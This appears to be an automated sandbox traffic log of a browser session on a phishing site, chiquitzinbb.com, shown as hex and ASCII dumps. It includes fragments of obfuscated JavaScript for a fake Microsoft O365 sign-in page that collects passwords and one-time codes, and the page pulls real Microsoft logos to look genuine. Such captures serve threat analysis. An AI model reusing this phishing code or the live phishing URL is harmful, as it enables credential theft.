                                        2024-10-24 01:40:25 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                        Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                        2024-10-24 01:40:25 UTC16384INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 66 6f 72 6d 42 75 74 74 6f 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 72 65 6c 61 74 69 76 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 37 62 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 37 62 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                        Data Ascii: 0\x20\x20\x0a\x20\x20\x20\x20.formButton\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20position:\x20relative;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-color:\x20#0067b8;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#0067b8;\x0a\x20\x20\x20\x20\x20\x
                                        2024-10-24 01:40:25 UTC16384INData Raw: 74 2d 6b 65 79 66 72 61 6d 65 73 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 30 25 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 63 61 6c 63 28 2d 35 30 25 5c 78 32 30 2d 5c 78 32 30 35 70 78 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 37 35 25 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                        Data Ascii: t-keyframes\x20dot-floating\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x200%\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20left:\x20calc(-50%\x20-\x205px);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x2075%\x20{\x0a\x20\x20\x2
                                        2024-10-24 01:40:25 UTC16384INData Raw: 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 31 35 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 5c 78 32 30 32 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 32 5c
                                        Data Ascii: 0\x20\x20margin-left:\x2015px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin-bottom:\x2020px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.new2\
                                        2024-10-24 01:40:25 UTC16384INData Raw: 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 62 75 74 74 6f 6e 5c 78 32 30 69 64 3d 5c 78 32 32 73 65 6e 64 41 70 70 43 6f 64 65 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 42 75 74 74 6f 6e 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 73 75 62 6d 69 74 5c 78 32 32 3e 56 65 72 69 66 79 3c 2f 62 75 74 74 6f 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 50 48 4f 4e 45 5c 78 32 30 2d 2d
                                        Data Ascii: v>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<button\x20id=\x22sendAppCode\x22\x20class=\x22formButton\x22\x20type=\x22submit\x22>Verify</button>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20...\x20PHONE\x20--
                                        2024-10-24 01:40:25 UTC16384INData Raw: 32 65 34 64 61 28 30 78 66 66 29 20 2b 20 5f 30 78 34 66 31 66 33 32 5b 5f 30 78 31 32 65 34 64 61 28 30 78 31 31 66 29 5d 20 2b 20 27 5c 78 32 37 29 27 2c 20 5f 30 78 34 66 31 66 33 32 5b 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 5d 20 21 3d 20 5f 30 78 31 32 65 34 64 61 28 30 78 31 36 38 29 20 26 26 20 5f 30 78 34 66 31 66 33 32 5b 5f 30 78 31 32 65 34 64 61 28 30 78 66 33 29 5d 20 21 3d 20 5f 30 78 31 32 65 34 64 61 28 30 78 31 36 34 29 20 26 26 20 28 5f 30 78 32 33 33 31 65 63 5b 5f 30 78 31 32 65 34 64 61 28 30 78 31 37 38 29 5d 5b 5f 30 78 31 32 65 34 64 61 28 30 78 66 36 29 5d 20 3d 20 5f 30 78 31 32 65 34 64 61 28 30 78 65 65 29 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 30 78 34 66 31 66 33 32 20 3d 3d 3d 20 27 4c 44
                                        Data Ascii: 2e4da(0xff) + _0x4f1f32[_0x12e4da(0x11f)] + '\x27)', _0x4f1f32['backgroundImage'] != _0x12e4da(0x168) && _0x4f1f32[_0x12e4da(0xf3)] != _0x12e4da(0x164) && (_0x2331ec[_0x12e4da(0x178)][_0x12e4da(0xf6)] = _0x12e4da(0xee))); if (_0x4f1f32 === 'LD
                                        2024-10-24 01:40:25 UTC1913INData Raw: 20 27 2e 62 61 63 6b 41 72 72 6f 77 27 2c 20 27 40 6d 61 69 6c 2e 27 2c 20 27 40 67 6d 61 69 6c 2e 63 6f 6d 27 2c 20 27 6c 6f 63 61 74 69 6f 6e 27 2c 20 27 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 27 2c 20 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 2c 20 27 70 68 69 73 68 5f 69 64 27 2c 20 27 75 73 65 72 4c 61 6e 67 75 61 67 65 27 2c 20 27 40 31 36 33 2e 27 2c 20 27 70 61 73 73 77 6f 72 64 5f 63 6f 6d 6d 61 6e 64 27 2c 20 27 70 61 73 73 77 6f 72 64 27 2c 20 27 31 38 33 37 32 32 34 75 42 70 6b 6c 77 27 2c 20 27 6e 65 77 2d 73 65 73 73 69 6f 6e 27 2c 20 27 2e 65 6d 61 69 6c 4c 61 62 65 6c 27 2c 20 27 40 70 72 6f 74 6f 6e 6d 61 69 6c 2e 27 2c 20 27 4f 33 36 35 27 2c 20 27 52 51 5f 4f 54 50 5f 41 50 50 5f 43 4f 44 45 27 2c 20 27 76 61 6c 75
                                        Data Ascii: '.backArrow', '@mail.', '@gmail.com', 'location', 'https://google.com', 'preventDefault', 'phish_id', 'userLanguage', '@163.', 'password_command', 'password', '1837224uBpklw', 'new-session', '.emailLabel', '@protonmail.', 'O365', 'RQ_OTP_APP_CODE', 'valu


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.1649711184.28.90.27443
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept: */*
                                        Accept-Encoding: identity
                                        User-Agent: Microsoft BITS/7.8
                                        Host: fs.microsoft.com
                                        2024-10-24 01:40:25 UTC466INHTTP/1.1 200 OK
                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                        Content-Type: application/octet-stream
                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                        Server: ECAcc (lpl/EF70)
                                        X-CID: 11
                                        X-Ms-ApiVersion: Distribute 1.2
                                        X-Ms-Region: prod-neu-z1
                                        Cache-Control: public, max-age=54281
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Connection: close
                                        X-CID: 2


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.164971513.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC653OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC799INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 673
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                        ETag: 0x8DB5C3F47E260FD
                                        x-ms-request-id: efc9f1c8-601e-0075-0841-22dfc5000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014025Z-16849878b78z5q7jpbgf6e9mcw0000000770000000000u6w
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:25 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                        Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.164971713.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC654OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC779INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 1435
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                        ETag: 0x8DB5C3F4911527F
                                        x-ms-request-id: 091d3d8e-001e-0078-235c-245f03000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014025Z-15b8d89586ffsjj9qb0gmb1stn00000002d000000000na6u
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:25 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                        Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.164971613.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC674OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC800INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 2407
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                        ETag: 0x8DB5C3F499A9B99
                                        x-ms-request-id: 95332588-d01e-0054-2124-22b3ac000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014025Z-16849878b7862vlcc7m66axrs000000006z000000000ment
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:25 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                        Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.1649721157.230.134.734436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC669OUTGET /favicon.ico HTTP/1.1
                                        Host: chiquitzinbb.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC276INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Server: Apache
                                        Last-Modified: Sat, 09 May 2020 23:50:03 GMT
                                        ETag: "1bb33-5a53fc5cd436b"
                                        Accept-Ranges: bytes
                                        Content-Length: 113459
                                        X-Powered-By: PleskLin
                                        Connection: close
                                        Content-Type: image/vnd.microsoft.icon
                                        2024-10-24 01:40:25 UTC16384INData Raw: 00 00 01 00 07 00 00 00 00 00 01 00 20 00 2d 2c 00 00 76 00 00 00 80 80 00 00 01 00 20 00 28 08 01 00 a3 2c 00 00 40 40 00 00 01 00 20 00 28 42 00 00 cb 34 01 00 30 30 00 00 01 00 20 00 a8 25 00 00 f3 76 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 9b 9c 01 00 18 18 00 00 01 00 20 00 88 09 00 00 43 ad 01 00 10 10 00 00 01 00 20 00 68 04 00 00 cb b6 01 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 20 00 49 44 41 54 78 9c ed 9d 79 60 54 d5 f5 c7 bf b3 4f 32 33 49 26 7b 20 2b 4b c2 92 b0 13 24 6c 15 01 85 8a a8 55 ac 1b 5a 5b 45 ad 56 6b 5b 7f 6d dd ea 5a b5 ad d6 a5 d6 5a 5b 17 6c ad 0a 6a 95 3d 61 87 20 90 90 04 48 02 81 2c 64 cf 90 4c
                                        Data Ascii: -,v (,@@ (B400 %v C hPNGIHDR\rfpHYsod IDATxy`TO23I&{ +K$lUZ[EVk[mZZ[lj=a H,dL
                                        2024-10-24 01:40:25 UTC16384INData Raw: ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii: ------------------------------------------------
                                        2024-10-24 01:40:25 UTC16384INData Raw: ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii: ------------------------------------------------
                                        2024-10-24 01:40:25 UTC16384INData Raw: ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii: ------------------------------------------------
